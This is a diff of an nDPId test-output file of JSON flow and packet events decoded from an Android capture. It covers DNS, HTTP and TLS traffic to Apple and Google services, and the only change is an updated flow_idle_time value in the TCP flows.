@@ -67,11 +67,11 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454867075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454867075,"pkt":"TGr2n\/YnxiwDYGpkCABFAADPTgIAAEARprrAqAIBwKgCEAA1ztkAu4V++6aBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABCKACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAACCAA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAVQAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEwAEEf01ycB\/AAEAAQAAABMABBH9NdA="} 
00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"} -00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"} +00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454867244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454867244,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qTJAAEARDBvAqAIQwKgCAYvxADUAKg90oPQBAAABAAAAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAQ=="} 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -86,134 +86,134 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454867639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867639,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRpSEAAEARUBnAqAIBwKgCEAA1huwAPTVyr3qBgAABAAEAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454867723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867723,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqYtAAEARC7\/AqAIQwKgCAdY1ADUALYAStecBAAABAAAAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454867761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867761,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRO4cAAEARubPAqAIBwKgCEAA11jUAPbDuteeBgAABAAEAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARgABKzZFEo="} 
00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} 
-02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c
60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="} 